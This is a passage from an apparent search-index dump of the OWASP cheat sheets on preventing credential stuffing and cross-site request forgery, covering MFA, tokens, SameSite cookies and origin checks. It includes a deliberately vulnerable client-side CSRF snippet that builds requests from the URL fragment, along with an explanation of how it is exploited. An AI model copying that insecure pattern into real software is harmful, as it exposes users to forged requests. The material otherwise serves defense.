"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html","title":"Credential Stuffing Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheatsheet covers defences against two common types of authentication-related attacks: credential stuffing and password spraying. Although these are separate, distinct attacks, in many cases the defences that would be implemented to protect against them are the same, and they would also be effective at protecting against brute-force attacks. A summary of these different attacks is listed below:

Attack Type Description Brute Force Testing multiple passwords from dictionary or other source against a single account. Credential Stuffing Testing username/password pairs obtained from the breach of another site. Password Spraying Testing a single weak password against a large number of different accounts."},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#multi-factor-authentication","title":"Multi-Factor Authentication","text":"

Multi-factor authentication (MFA) is by far the best defense against the majority of password-related attacks, including credential stuffing and password spraying, with analysis by Microsoft suggesting that it would have stopped 99.9% of account compromises. As such, it should be implemented wherever possible; however, depending on the audience of the application, it may not be practical or feasible to enforce the use of MFA.

In order to balance security and usability, multi-factor authentication can be combined with other techniques to require for 2nd factor only in specific circumstances where there is reason to suspect that the login attempt may not be legitimate, such as a login from:

Additionally, for enterprise applications, known trusted IP ranges could be added to an allow list so that MFA is not required when users connect from these ranges.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#alternative-defenses","title":"Alternative Defenses","text":"

Where it is not possible to implement MFA, there are many alternative defenses that can be used to protect against credential stuffing and password spraying. In isolation none of these are as effective as MFA, however if multiple defenses are implemented in a layered approach, they can provide a reasonable degree of protection. In many cases, these mechanisms will also protect against brute-force or password spraying attacks.

Where an application has multiple user roles, it may be appropriate to implement different defenses for different roles. For example, it may not be feasible to enforce MFA for all users, but it should be possible to require that all administrators use it.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#secondary-passwords-pins-and-security-questions","title":"Secondary Passwords, PINs and Security Questions","text":"

As well as requiring a user to enter their password when authenticating, they can also be prompted to provide additional security information such as:

It must be emphasised that this does not constitute multi-factor authentication (as both factors are the same - something you know). However, it can still provide a useful layer of protection against both credential stuffing and password spraying where proper MFA can't be implemented.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#captcha","title":"CAPTCHA","text":"

Requiring a user to solve a CAPTCHA for each login attempt can help to prevent automated login attempts, which would significantly slow down a credential stuffing or password spraying attack. However, CAPTCHAs are not perfect, and in many cases tools exist that can be used to break them with a reasonably high success rate.

To improve usability, it may be desirable to only require the user solve a CAPTCHA when the login request is considered suspicious, using the same criteria discussed above.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#ip-block-listing","title":"IP Block-listing","text":"

Less sophisticated attacks will often use a relatively small number of IP addresses, which can be block-listed after a number of failed login attempts. These failures should be tracked separately to the per-user failures, which are intended to protect against brute-force attacks. The block list should be temporary, in order to reduce the likelihood of permanently blocking legitimate users.

Additionally, there are publicly available block lists of known bad IP addresses which are collected by websites such as AbuseIPDB based on abuse reports from users.

Consider storing the last IP address which successfully logged in to each account, and if this IP address is added to a block list, then taking appropriate action such as locking the account and notifying the user, as it likely that their account has been compromised.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#device-fingerprinting","title":"Device Fingerprinting","text":"

Aside from the IP address, there are a number of different factors that can be used to attempt to fingerprint a device. Some of these can be obtained passively by the server from the HTTP headers (particularly the \"User-Agent\" header), including:

Using JavaScript it is possible to access far more information, such as:

Using these various attributes, it is possible to create a fingerprint of the device. This fingerprint can then be matched against any browser attempting to login to the account, and if it doesn't match then the user can be prompted for additional authentication. Many users will have multiple devices or browsers that they use, so it is not practical to block attempts that do not match the existing fingerprints.

The fingerprintjs2 JavaScript library can be used to carry out client-side fingerprinting.

It should be noted that as all this information is provided by the client, it can potentially be spoofed by an attacker. In some cases spoofing these attributes is trivial (such as the \"User-Agent\") header, but in other cases it may be more difficult to modify these attributes.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#require-unpredictable-usernames","title":"Require Unpredictable Usernames","text":"

Credential stuffing attacks rely on not just the re-use of passwords between multiple sites, but also the re-use of usernames. A significant number of websites use the email address as the username, and as most users will have a single email address they use for all their accounts, this makes the combination of an email address and password very effective for credential stuffing attacks.

Requiring users to create their own username when registering on the website makes it harder for an attacker to obtain valid username and password pairs for credential stuffing, as many of the available credential lists only include email addresses. Providing the user with a generated username can provide a higher degree of protection (as users are likely to choose the same username on most websites), but is user unfriendly. Additionally, care needs to be taken to ensure that the generated username is not predictable (such as being based on the user's full name, or sequential numeric IDs), as this could make enumerating valid usernames for a password spraying attack easier.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#defense-in-depth","title":"Defense in Depth","text":"

The following mechanisms are not sufficient to prevent credential stuffing or password spraying attacks; however they can be used to make the attacks more time consuming or technically difficult to implement. This can be useful to defend against opportunistic attackers, who use off-the-shelf tools and are likely to be discouraged by any technical barriers, but will not be sufficient against a more targeted attack.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#multi-step-login-processes","title":"Multi-Step Login Processes","text":"

The majority of off-the-shelf tools are designed for a single step login process, where the credentials are POSTed to the server, and the response indicates whether or not the login attempt was successful. By adding additional steps to this process, such as requiring the username and password to be entered sequentially, or requiring that the user first obtains a random CSRF Token before they can login, this makes the attack slightly more difficult to perform, and doubles the number of requests that the attacker must make.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#require-javascript-and-block-headless-browsers","title":"Require JavaScript and Block Headless Browsers","text":"

Most tools used for these types of attacks will make direct POST requests to the server and read the responses, but will not download or execute JavaScript that was contained in them. By requiring the attacker to evaluate JavaScript in the response (for example to generate a valid token that must be submitted with the request), this forces the attacker to either use a real browser with an automation framework like Selenium or Headless Chrome, or to implement JavaScript parsing with another tool such as PhantomJS. Additionally, there are a number of techniques that can be used to identify Headless Chrome or PhantomJS.

Please note that blocking visitors who have JavaScript disabled will reduce the accessibility of the website, especially to visitors who use screen readers. In certain jurisdictions this may be in breach of equalities legislation.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#identifying-leaked-passwords","title":"Identifying Leaked Passwords","text":"

When a user sets a new password on the application, as well as checking it against a list of known weak passwords, it can also be checked against passwords that have previously been breached. The most well known public service for this is Pwned Passwords. You can host a copy of the application yourself, or use the API.

In order to protect the value of the source password being searched for, Pwned Passwords implements a k-Anonymity model that allows a password to be searched for by partial hash. This allows the first 5 characters of a SHA-1 password hash to be passed to the API.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#notify-users-about-unusual-security-events","title":"Notify users about unusual security events","text":"

When suspicious or unusual activity is detected, it may be appropriate to notify or warn the user. However, care should be taken that the user does not get overwhelmed with a large number of notifications that are not important to them, or they will just start to ignore or delete them.

For example, it would generally not be appropriate to notify a user that there had been an attempt to login to their account with an incorrect password. However, if there had been a login with the correct password, but which had then failed the subsequent MFA check, the user should be notified so that they can change their password.

Details related to current or recent logins should also be made visible to the user. For example, when they login to the application, the date, time and location of their previous login attempt could be displayed to them. Additionally, if the application supports concurrent sessions, the user should be able to view a list of all active sessions, and to terminate any other sessions that are not legitimate.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html","title":"Cross-Site Request Forgery Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Cross-Site Request Forgery (CSRF)\u00a0is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site when the user is authenticated. A CSRF attack works because browser requests automatically include all cookies including session cookies. Therefore, if the user is authenticated to the site, the site cannot distinguish between legitimate authorized requests and forged authenticated requests. This attack is thwarted when proper Authorization is used, which implies that a challenge-response mechanism is required that verifies the identity and authority of the requester.

The impact of a successful CSRF attack is limited to the capabilities exposed by the vulnerable application and privileges of the user. For example, this attack could result in a transfer of funds, changing a password, or making a purchase with the user's credentials. In effect, CSRF attacks are used by an attacker to make a target system perform a function via the victim's browser, without the victim's knowledge, at least until the unauthorized transaction has been committed.

In short, the following principles should be followed to defend against CSRF:

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#token-based-mitigation","title":"Token Based Mitigation","text":"

The synchronizer token pattern is one of the most popular and recommended methods to mitigate CSRF.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#use-built-in-or-existing-csrf-implementations-for-csrf-protection","title":"Use Built-In Or Existing CSRF Implementations for CSRF Protection","text":"

Synchronizer token defenses have been built into many frameworks. It is strongly recommended to research if the framework you are using has an option to achieve CSRF protection by default before trying to build your custom token generating system. For example, .NET has built-in protection that adds a token to CSRF vulnerable resources. You are responsible for proper configuration (such as key management and token management) before using these built-in CSRF protections that generate tokens to guard CSRF vulnerable resources.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#synchronizer-token-pattern","title":"Synchronizer Token Pattern","text":"

CSRF tokens should be generated on the server-side. They can be generated once per user session or for each request. Per-request tokens are more secure than per-session tokens as the time range for an attacker to exploit the stolen tokens is minimal. However, this may result in usability concerns. For example, the \"Back\" button browser capability is often hindered as the previous page may contain a token that is no longer valid. Interaction with this previous page will result in a CSRF false positive security event on the server. In per-session token implementations after the initial generation of a token, the value is stored in the session and is used for each subsequent request until the session expires.

When a request is issued by the client, the server-side component must verify the existence and validity of the token in the request compared to the token found in the user session. If the token was not found within the request, or the value provided does not match the value within the user session, then the request should be rejected. Additional actions such as logging the event as a potential CSRF attack in progress should also be considered.

CSRF tokens should be:

CSRF tokens prevent CSRF because without a token, an attacker cannot create valid requests to the backend server.

For the Synchronised Token Pattern, CSRF tokens should not be transmitted using cookies.

The CSRF token can be transmitted to the client as part of a response payload, such as a HTML or JSON response. It can then be transmitted back to the server as a hidden field on a form submission, or via an AJAX request as a custom header value or part of a JSON payload. Make sure that the token is not leaked in the server logs, or in the URL. CSRF tokens in GET requests are potentially leaked at several locations, such as the browser history, log files, network utilities that log the first line of a HTTP request, and Referer headers if the protected site links to an external site.

For example:

<form action=\"/transfer.do\" method=\"post\">\n<input type=\"hidden\" name=\"CSRFToken\" value=\"OWY4NmQwODE4ODRjN2Q2NTlhMmZlYWEwYzU1YWQwMTVhM2JmNGYxYjJiMGI4MjJjZDE1ZDZMGYwMGEwOA==\">\n[...]\n</form>\n

Inserting the CSRF token in a custom HTTP request header via JavaScript is considered more secure than adding the token in the hidden field form parameter because requests with custom headers are automatically subject to the same-origin policy.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#double-submit-cookie","title":"Double Submit Cookie","text":"

If maintaining the state for CSRF token on the server is problematic, you can use an alternative technique known as the Double Submit Cookie pattern. This technique is easy to implement and is stateless. There are different ways to implement this technique, where the naive pattern is the most commonly used variation.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#naive-double-submit-cookie","title":"Naive Double Submit Cookie","text":"

The Naive Double Submit Cookie is a scalable and easy-to-implement technique where we send a random value in both a cookie and as a request parameter, with the server verifying if the cookie value and request value match. When a user visits (even before authenticating to prevent login CSRF), the site should generate a (ideally cryptographically strong) random value and set it as a cookie on the user's machine separate from the session identifier. The site then requires that every transaction request includes this random value as a hidden form value, or in the request header. If both of them match at server side, the server accepts it as legitimate request and if they don't, it would reject the request.

In a nutshell, an attacker is unable to access the cookie value during a cross-site request. This prevents them from including a matching value in the hidden form value or as a request parameter/header.

The Naive Double Submit Cookie method is a good initial step to counter CSRF attacks, but it remains vulnerable to certain attacks. This resource provides more information on some vulnerabilities. It is therefore recommended to use a more secure implementation, the Signed Double Submit Cookie pattern.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#signed-double-submit-cookie","title":"Signed Double Submit Cookie","text":"

The Signed Double Submit Cookie involves a secret key known only to the server. This ensures that an attacker cannot create and inject their own, known, CSRF token into the victim's authenticated session. Tokens can be secured by hashing or encrypting them, with HMAC algorithm being a popular choice due to its fast speed and easy implementation.

In both cases, it is recommended to bind the CSRF token with the users current session to even further enhance security.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#hmac-csrf-token","title":"HMAC CSRF Token","text":"

A simpler alternative to an encrypted CSRF cookie is to use HMAC (Hash-based Message Authentication Code) to hash the random value with a secret key known only by the server and place this value in a cookie. This is similar to an encrypted cookie (both require knowledge only the server holds), but is less computationally intensive than encrypting and decrypting the cookie.

We recommend generating the HMAC CSRF Token, with a session-dependent user value, using the following steps:

Below is an example in pseudo-code that demonstrates the implementation steps described above:

// Gather the values\nsecret = readEnvironmentVariable(\"CSRF_SECRET\") // HMAC secret key\nsessionID = session.sessionID // Current authenticated user session\nrandomValue = cryptographic.randomValue() // Cryptographic random value\n\n// Create the CSRF Token\nmessage = sessionID + \"!\" + randomValue // HMAC message payload\nhmac = hmac(\"SHA256\", secret, message) // Generate the HMAC hash\ncsrfToken = hmac + \".\" + message // Combine HMAC hash with message to generate the token. The plain message is required to later authenticate it against its HMAC hash\n\n// Store the CSRF Token in a cookie\nresponse.setCookie(\"csrf_token=\" + csrfToken + \"; Secure) // Set Cookie without HttpOnly flag\n

Should Timestamps be Included in CSRF Tokens for Expiration? It's a common misconception to include timestamps as a value to specify the CSRF token expiration time. A CSRF Token is not an access token. They are used to verify the authenticity of requests throughout a session, using session information. A new session should generate a new token (1).

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#custom-request-headers","title":"Custom Request Headers","text":"

Both the synchronizer token and the double submit cookie are used to prevent forgery of form data, but they can be tricky to implement and degrade usability. Many modern web applications do not use <form> tags. A user-friendly defense that is particularly well suited for AJAX or API endpoints is the use of a custom request header. No token is needed for this approach.

In this pattern, the client appends a custom header to requests that require CSRF protection. The header can be any arbitrary key-value pair, as long as it does not conflict with existing headers.

X-YOURSITE-CSRF-PROTECTION=1\n

When handling the request, the API checks for the existence of this header. If the header does not exist, the backend rejects the request as potential forgery. This approach has several advantages:

If you use <form> tags anywhere in your client, you will still need to protect them with alternate approaches described in this document such as tokens.

This defense relies on the browser's same-origin policy (SOP) restriction that only JavaScript can be used to add a custom header, and only within its origin. By default, browsers do not allow JavaScript to make cross origin requests with custom headers. Only JavaScript that you serve from your origin can add these headers.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#custom-headers-and-cors","title":"Custom Headers and CORS","text":"

Cookies are not set on cross-origin requests (CORS) by default. To enable cookies on an API, you will set Access-Control-Allow-Credentials=true. The browser will reject any response that includes Access-Control-Allow-Origin=* if credentials are allowed. To allow CORS requests, but protect against CSRF, you need to make sure the server only whitelists a few select origins that you definitively control via the Access-Control-Allow-Origin header. Any cross-origin request from an allowed domain will be able to set custom headers.

As an example, you might configure your backend to allow CORS with cookies from http://www.yoursite.com and http://mobile.yoursite.com, so that the only possible preflight responses are:

Access-Control-Allow-Origin=http://mobile.yoursite.com\nAccess-Control-Allow-Credentials=true\n

or

Access-Control-Allow-Origin=http://www.yoursite.com\nAccess-Control-Allow-Credentials=true\n

A less secure configuration would be to configure your backend server to allow CORS from all subdomains of your site using a regular expression. If an attacker is able to take over a subdomain (not uncommon with cloud services) your CORS configuration would allow them to bypass the same origin policy and forge a request with your custom header.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#defense-in-depth-techniques","title":"Defense In Depth Techniques","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#samesite-cookie-attribute","title":"SameSite Cookie Attribute","text":"

SameSite is a cookie attribute (similar to HTTPOnly, Secure etc.) which aims to mitigate CSRF attacks. It is defined in RFC6265bis. This attribute helps the browser decide whether to send cookies along with cross-site requests. Possible values for this attribute are Lax, Strict, or None.

The Strict value will prevent the cookie from being sent by the browser to the target site in all cross-site browsing context, even when following a regular link. For example, for a GitHub-like website this would mean that if a logged-in user follows a link to a private GitHub project posted on a corporate discussion forum or email, GitHub will not receive the session cookie and the user will not be able to access the project. A bank website however doesn't want to allow any transactional pages to be linked from external sites, so the Strict flag would be most appropriate.

The default Lax value provides a reasonable balance between security and usability for websites that want to maintain user's logged-in session after the user arrives from an external link. In the above GitHub scenario, the session cookie would be allowed when following a regular link from an external website while blocking it in CSRF-prone request methods such as POST. Only cross-site-requests that are allowed in Lax mode are the ones that have top-level navigations and are also safe HTTP methods.

For more details on the SameSite values, check the following section from the rfc.

Example of cookies using this attribute:

Set-Cookie: JSESSIONID=xxxxx; SameSite=Strict\nSet-Cookie: JSESSIONID=xxxxx; SameSite=Lax\n

All desktop browsers and almost all mobile browsers now support the SameSite attribute. To keep track of the browsers implementing it and the usage of the attribute, refer to the following service. Note that Chrome has announced that they will mark cookies as SameSite=Lax by default from Chrome 80 (due in February 2020), and Firefox and Edge are both planning to follow suit. Additionally, the Secure flag will be required for cookies that are marked as SameSite=None.

It is important to note that this attribute should be implemented as an additional layer defense in depth concept. This attribute protects the user through the browsers supporting it, and it contains as well 2 ways to bypass it as mentioned in the following section. This attribute should not replace having a CSRF Token. Instead, it should co-exist with that token in order to protect the user in a more robust way.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#verifying-origin-with-standard-headers","title":"Verifying Origin With Standard Headers","text":"

There are two steps to this mitigation, both of which rely on examining an HTTP request header value.

  1. Determining the origin the request is coming from (source origin). Can be done via Origin or Referer headers.
  2. Determining the origin the request is going to (target origin).

At server side we verify if both of them match. If they do, we accept the request as legitimate (meaning it's the same origin request) and if they don't, we discard the request (meaning that the request originated from cross-domain). Reliability on these headers comes from the fact that they cannot be altered programmatically as they fall under forbidden headers list, meaning that only the browser can set them.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#identifying-source-origin-via-originreferer-header","title":"Identifying Source Origin (via Origin/Referer header)","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#checking-the-origin-header","title":"Checking the Origin Header","text":"

If the Origin header is present, verify that its value matches the target origin. Unlike the Referer, the Origin header will be present in HTTP requests that originate from an HTTPS URL.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#checking-the-referer-header","title":"Checking the Referer Header","text":"

If the Origin header is not present, verify the hostname in the Referer header matches the target origin. This method of CSRF mitigation is also commonly used with unauthenticated requests, such as requests made prior to establishing a session state, which is required to keep track of a synchronization token.

In both cases, make sure the target origin check is strong. For example, if your site is example.org make sure example.org.attacker.com does not pass your origin check (i.e, match through the trailing / after the origin to make sure you are matching against the entire origin).

If neither of these headers are present, you can either accept or block the request. We recommend blocking. Alternatively, you might want to log all such instances, monitor their use cases/behavior, and then start blocking requests only after you get enough confidence.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#identifying-the-target-origin","title":"Identifying the Target Origin","text":"

You might think it's easy to determine the target origin, but it's frequently not. The first thought is to simply grab the target origin (i.e., its hostname and port #) from the URL in the request. However, the application server is frequently sitting behind one or more proxies and the original URL is different from the URL the app server actually receives. If your application server is directly accessed by its users, then using the origin in the URL is fine and you're all set.

If you are behind a proxy, there are a number of options to consider.

This mitigation is working properly when origin or referrer headers are present in the requests. Though these headers are included majority of the time, there are few use cases where they are not included (most of them are for legitimate reasons to safeguard users privacy/to tune to browsers ecosystem). The following lists some use cases:

Usually, a minor percentage of traffic does fall under above categories (1-2%) and no enterprise would want to lose this traffic. One of the popular technique used across the Internet to make this technique more usable is to accept the request if the Origin/referrer matches your configured list of domains \"OR\" a null value (Examples here. The null value is to cover the edge cases mentioned above where these headers are not sent). Please note that, attackers can exploit this but people prefer to use this technique as a defense in depth measure because of the minor effort involved in deploying it.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#cookie-with-__host-prefix","title":"Cookie with __Host- prefix","text":"

Another solution for this problem is use of Cookie Prefixes for cookie with CSRF token. If cookie has __Host- prefix e.g. Set-Cookie: __Host-token=RANDOM; path=/; Secure then the cookie:

As of July 2020 cookie prefixes are supported by all major browsers except Internet Explorer.

See the Mozilla Developer Network and IETF Draft for further information about cookie prefixes.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#user-interaction-based-csrf-defense","title":"User Interaction Based CSRF Defense","text":"

While all the techniques referenced here do not require any user interaction, sometimes it's easier or more appropriate to involve the user in the transaction to prevent unauthorized operations (forged via CSRF or otherwise). The following are some examples of techniques that can act as strong CSRF defense when implemented correctly.

While these are a very strong CSRF defense, it can create a significant impact on the user experience. As such, they would generally only be used for security critical operations (such as password change, money transfers, etc.), alongside the other defences discussed in this cheat sheet.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#login-csrf","title":"Login CSRF","text":"

Most developers tend to ignore CSRF vulnerability on login forms as they assume that CSRF would not be applicable on login forms because user is not authenticated at that stage, however this assumption is not always true. CSRF vulnerabilities can still occur on login forms where the user is not authenticated, but the impact and risk is different.

For example, if an attacker uses CSRF to assume an authenticated identity of a target victim on a shopping website using the attacker's account, and the victim then enters their credit card information, an attacker may be able to purchase items using the victim's stored card details. For more information about login CSRF and other risks, see section 3 of this paper.

Login CSRF can be mitigated by creating pre-sessions (sessions before a user is authenticated) and including tokens in login form. You can use any of the techniques mentioned above to generate tokens. Remember that pre-sessions cannot be transitioned to real sessions once the user is authenticated - the session should be destroyed and a new one should be made to avoid session fixation attacks. This technique is described in Robust Defenses for Cross-Site Request Forgery section 4.1.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#client-side-csrf","title":"Client-side CSRF","text":"

Client-side CSRF is a new variant of CSRF attacks where the attacker tricks the client-side JavaScript code to send a forged HTTP request to a vulnerable target site by manipulating the program\u2019s input parameters. Client-side CSRF originates when the JavaScript program uses attacker-controlled inputs, such as the URL, for the generation of asynchronous HTTP requests.

Note: These variants of CSRF are particularly important as they can bypass some of the common anti-CSRF countermeasures like token-based mitigations and SameSite cookies. For example, when synchronizer tokens or custom HTTP request headers are used, the JavaScript program will include them in the asynchronous requests. Also, web browsers will include cookies in same-site request contexts initiated by JavaScript programs, circumventing the SameSite cookie policies.

Client-side vs. Classical CSRF: In the classical CSRF, the vulnerable component is the server-side program, which cannot distinguish whether the incoming authenticated request was performed intentionally, also known as the confused deputy problem. In the client-side CSRF, the vulnerable component is the client-side JavaScript program instead, which allows an attacker to generate arbitrary asynchronous requests, e.g., by manipulating the request endpoint and/or its parameters. Client-side CSRF is an input validation problem, that when exploited, reintroduces the confused deputy flaw, that is, the server-side won't, again, be able to distinguish if the request was performed intentionally or not.

For more information about client-side CSRF vulnerabilities, see Sections 2 and 5 of this paper, the CSRF chapter of the SameSite wiki, and this post by the Facebook Whitehat program.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#client-side-csrf-example","title":"Client-side CSRF Example","text":"

The following code snippet demonstrates a simple example of a client-side CSRF vulnerability.

<script type=\"text/javascript\">\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\nfunction ajaxLoad(){\n// process the URL hash fragment\nlet hash_fragment = window.location.hash.slice(1);  // hash fragment should be of the format: /^(get|post);(.*)$/\n// e.g., https://site.com/index/#post;/profile\nif(hash_fragment.length > 0 && hash_fragment.indexOf(';') > 0 ){\n\nlet params = hash_fragment.match(/^(get|post);(.*)$/);\nif(params && params.length){\nlet request_method = params[1];   let request_endpoint = params[3];\n\nfetch(request_endpoint, {\nmethod: request_method,\nheaders: {\n'XSRF-TOKEN': csrf_token,\n// [...]\n},\n// [...]\n}).then(response => { /* [...] */ }); }\n}\n}\n// trigger the async request on page load\nwindow.onload = ajaxLoad();\n</script>\n

Vulnerability: In this snippet, the program invokes a function ajaxLoad() upon the page load, which is responsible for loading various webpage elements. The function reads the value of the URL hash fragment (line 4), and extracts two pieces of information from it (i.e., request method and endpoint) to generate an asynchronous HTTP request (lines 11-13). The vulnerability occurs in lines 15-22, when the JavaScript program uses URL fragments to obtain the server-side endpoint for the asynchronous HTTP request (line 15) and the request method. However, both inputs can be controlled by web attackers, who can pick the value of their choosing, and craft a malicious URL containing the attack payload.

Attack: For exploitation, attackers can share the malicious URL with the victim (e.g., spear-phishing emails) and convince them to click on it, because such URL belongs to the origin of an honest, reputable but vulnerable website. Alternatively, they can use it as a part of an attack page they control and abuse browser APIs (e.g., the window.open() API) to trick the vulnerable JavaScript of the target page to send the HTTP request, which closely resemles the attack model of the classical CSRF attacks.

For more examples of client-side CSRF, see this post by the Facebook Whitehat program and this USENIX Security paper.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#client-side-csrf-mitigation-techniques","title":"Client-side CSRF Mitigation Techniques","text":"

Independent Requests: Client-side CSRF can be prevented if asynchronous requests are not generated via attacker controllable inputs, such as the URL, window name, document referrer, and postMessages, to name only a few examples.

Input Validation: Achieving complete isolaion between inputs and request parameters may not always be possible depending on the context and functionality. In these cases, input validation checks has to be implemented. These checks should strictly assess the format and choice of the values of the request parameters and decide whether they can only be used in non-state-changing operations (e.g., only allow GET requests and endpoints starting with a predefined prefix).

Predefined Request Data: Another mitigation technique is to store a list of predefined, safe request data in the JavaScript code (e.g., combinations of endpoints, request methods and other parameters that are safe to be replayed). The program can then use a switch parameter in the URL fragment to decide which entry of the list should each JavaScript function use.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#java-reference-example","title":"Java Reference Example","text":"

The following JEE web filter provides an example reference for some of the concepts described in this cheatsheet. It implements the following stateless mitigations (OWASP CSRFGuard, cover a stateful approach).

Please note that it only acts a reference sample and is not complete (for example: it doesn't have a block to direct the control flow when origin and referrer header check succeeds nor it has a port/host/protocol level validation for referrer header). Developers are recommended to build their complete mitigation on top of this reference sample. Developers should also implement authentication and authorization mechanisms before checking for CSRF is considered effective.

Full source is located here and provides a runnable POC.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#javascript-guidance-for-auto-inclusion-of-csrf-tokens-as-an-ajax-request-header","title":"JavaScript Guidance for Auto-inclusion of CSRF tokens as an AJAX Request header","text":"

The following guidance considers GET, HEAD and OPTIONS methods are safe operations. Therefore GET, HEAD, and OPTIONS method AJAX calls need not be appended with a CSRF token header. However, if the verbs are used to perform state changing operations, they will also require a CSRF token header (although this is bad practice, and should be avoided).

The POST, PUT, PATCH, and DELETE methods, being state changing verbs, should have a CSRF token attached to the request. The following guidance will demonstrate how to create overrides in JavaScript libraries to have CSRF tokens included automatically with every AJAX request for the state changing methods mentioned above.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#storing-the-csrf-token-value-in-the-dom","title":"Storing the CSRF Token Value in the DOM","text":"

A CSRF token can be included in the <meta> tag as shown below. All subsequent calls in the page can extract the CSRF token from this <meta> tag. It can also be stored in a JavaScript variable or anywhere on the DOM. However, it is not recommended to store it in cookies or browser local storage.

The following code snippet can be used to include a CSRF token as a <meta> tag:

<meta name=\"csrf-token\" content=\"{{ csrf_token() }}\">\n

The exact syntax of populating the content attribute would depend on your web application's backend programming language.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#overriding-defaults-to-set-custom-header","title":"Overriding Defaults to Set Custom Header","text":"

Several JavaScript libraries allow for overriding default settings to have a header added automatically to all AJAX requests.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#xmlhttprequest-native-javascript","title":"XMLHttpRequest (Native JavaScript)","text":"

XMLHttpRequest's open() method can be overridden to set the anti-csrf-token header whenever the open() method is invoked next. The function csrfSafeMethod() defined below will filter out the safe HTTP methods and only add the header to unsafe HTTP methods.

This can be done as demonstrated in the following code snippet:

<script type=\"text/javascript\">\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\nfunction csrfSafeMethod(method) {\n// these HTTP methods do not require CSRF protection\nreturn (/^(GET|HEAD|OPTIONS)$/.test(method));\n}\nvar o = XMLHttpRequest.prototype.open;\nXMLHttpRequest.prototype.open = function(){\nvar res = o.apply(this, arguments);\nvar err = new Error();\nif (!csrfSafeMethod(arguments[0])) {\nthis.setRequestHeader('anti-csrf-token', csrf_token);\n}\nreturn res;\n};\n</script>\n
"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#angularjs","title":"AngularJS","text":"

AngularJS allows for setting default headers for HTTP operations. Further documentation can be found at AngularJS's documentation for $httpProvider.

